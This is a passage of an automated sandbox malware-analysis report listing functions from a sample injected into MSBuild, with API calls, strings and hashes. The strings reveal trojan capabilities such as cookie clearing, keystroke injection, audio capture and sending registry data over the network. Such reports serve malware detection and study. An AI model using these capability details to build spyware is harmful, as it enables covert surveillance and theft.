                                                                                                                        • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                                        Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                                        • __freea.LIBCMT ref: 00452DAA
                                                                                                                        • __freea.LIBCMT ref: 00452DB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 201697637-0
                                                                                                                        • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                                        • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                                        • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                                        • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                        Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                        • _free.LIBCMT ref: 00444714
                                                                                                                        • _free.LIBCMT ref: 0044472D
                                                                                                                        • _free.LIBCMT ref: 0044475F
                                                                                                                        • _free.LIBCMT ref: 00444768
                                                                                                                        • _free.LIBCMT ref: 00444774
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                        • String ID: C
                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                        • Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                                        • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                        • Opcode Fuzzy Hash: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                                        • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                        Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: tcp$udp
                                                                                                                        • API String ID: 0-3725065008
                                                                                                                        • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                        • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                        • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                        • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                        Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                        • String ID: T=G$p[G$>G$>G
                                                                                                                        • API String ID: 1596592924-2461731529
                                                                                                                        • Opcode ID: 0bcdf1af44f42523717d6e0888b3946a9b799004678d95474f77185bdb4abe82
                                                                                                                        • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                        • Opcode Fuzzy Hash: 0bcdf1af44f42523717d6e0888b3946a9b799004678d95474f77185bdb4abe82
                                                                                                                        • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                        Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                          • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                          • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                        • String ID: .part
                                                                                                                        • API String ID: 1303771098-3499674018
                                                                                                                        • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                        • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                        • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                        • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                        Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                          • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                          • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                        • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                        • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                        • API String ID: 37874593-703403762
                                                                                                                        • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                        • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                                        • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                        • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                                        Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                                        • __freea.LIBCMT ref: 00449B37
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • __freea.LIBCMT ref: 00449B40
                                                                                                                        • __freea.LIBCMT ref: 00449B65
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864826663-0
                                                                                                                        • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                                        • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                                        • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                                        • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                                        Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32 ref: 00418B08
                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                          • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSend$Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1167301434-0
                                                                                                                        • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                        • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                                        • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                        • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                                        Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00447EBC
                                                                                                                        • _free.LIBCMT ref: 00447EE0
                                                                                                                        • _free.LIBCMT ref: 00448067
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                        • _free.LIBCMT ref: 00448233
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314583886-0
                                                                                                                        • Opcode ID: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                                                        • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                                        • Opcode Fuzzy Hash: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                                                        • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                                        Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                        • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                        • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                        • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                        Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • _free.LIBCMT ref: 00444086
                                                                                                                        • _free.LIBCMT ref: 0044409D
                                                                                                                        • _free.LIBCMT ref: 004440BC
                                                                                                                        • _free.LIBCMT ref: 004440D7
                                                                                                                        • _free.LIBCMT ref: 004440EE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                        • String ID: J7D
                                                                                                                        • API String ID: 3033488037-1677391033
                                                                                                                        • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                        • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                        • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                        • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                        Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                                        • __fassign.LIBCMT ref: 0044A180
                                                                                                                        • __fassign.LIBCMT ref: 0044A19B
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                        • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                                        • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                        • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                                        Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID: HE$HE
                                                                                                                        • API String ID: 269201875-1978648262
                                                                                                                        • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                                        • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                                        • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                                        • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                                        Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                          • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                          • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                        • String ID: TUFTUF$>G$DG$DG
                                                                                                                        • API String ID: 3114080316-344394840
                                                                                                                        • Opcode ID: 5ada2776117986fdda91317c1ef980534e519c22f238f3628a5ce40721f5b323
                                                                                                                        • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                                        • Opcode Fuzzy Hash: 5ada2776117986fdda91317c1ef980534e519c22f238f3628a5ce40721f5b323
                                                                                                                        • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                        Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                        • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                        • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                        • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                        Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                        • API String ID: 1133728706-4073444585
                                                                                                                        • Opcode ID: 76dec9bc07e0ce05070ce1aa69bd4cc692330d266f7d642bb6ee31461e7252f1
                                                                                                                        • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                                        • Opcode Fuzzy Hash: 76dec9bc07e0ce05070ce1aa69bd4cc692330d266f7d642bb6ee31461e7252f1
                                                                                                                        • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                                        Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
